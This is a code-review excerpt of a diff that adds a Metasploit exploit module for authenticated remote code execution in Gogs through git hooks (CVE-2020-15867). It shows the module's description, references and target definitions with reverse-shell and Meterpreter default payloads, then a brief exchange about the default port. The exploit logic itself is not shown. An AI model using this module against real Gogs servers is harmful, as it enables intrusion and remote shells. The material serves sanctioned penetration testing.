modules/exploits/multi/http/gogs_git_hooks_rce.rb

```diff
@@ -0,0 +1,374 @@
+          interface, creates a temporary repository, sets a `post-receive` git
+          hook with the payload and creates a dummy file in the repository.
+          This last action will trigger the git hook and execute the payload.
+          Everything is done through the web interface.
+
+          No mitigation has been implemented so far (latest stable version is
+          0.12.3).
+
+          This module has been tested successfully against version 0.12.3 on
+          docker. Windows version could not be tested since the git hook feature
+          seems to be broken.
+        },
+        'Author' => [
+          'Podalirius',             # Original PoC
+          'Christophe De La Fuente' # MSF Module
+        ],
+        'References' => [
+          ['CVE', '2020-15867'],
+          ['EDB', '49571'],
+          ['URL', 'https://podalirius.net/articles/exploiting-cve-2020-14144-gitea-authenticated-remote-code-execution/'],
+          ['URL', 'https://www.fzi.de/en/news/news/detail-en/artikel/fsa-2020-3-schwachstelle-in-gitea-1126-und-gogs-0122-ermoeglicht-ausfuehrung-von-code-nach-authent/']
+        ],
+        'DisclosureDate' => '2020-10-07',
+        'License' => MSF_LICENSE,
+        'Platform' => %w[unix linux win],
+        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+        'Privileged' => false,
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_bash'
+              }
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :linux_dropper,
+              'DefaultOptions' => {
+                'CMDSTAGER::FLAVOR' => :bourne,
+                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
+              }
+            }
+          ],
+          [
+            'Windows Command',
+            {
+              'Platform' => 'win',
+              'Arch' => ARCH_CMD,
+              'Type' => :win_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp'
+              }
+            }
+          ],
+          [
+            'Windows Dropper',
+            {
+              'Platform' => 'win',
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :win_dropper,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'
+              }
+            }
+          ],
+        ],
+        'DefaultOptions' => { 'WfsDelay' => 30 },
+        'DefaultTarget' => 1,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION]
+        }
+      )
+    )
+
+    register_options([
```

Comment:
Opt for default `RPORT` of `10080`?

Reply:
the default port is also 3000, so I will add it as the default RPORT too.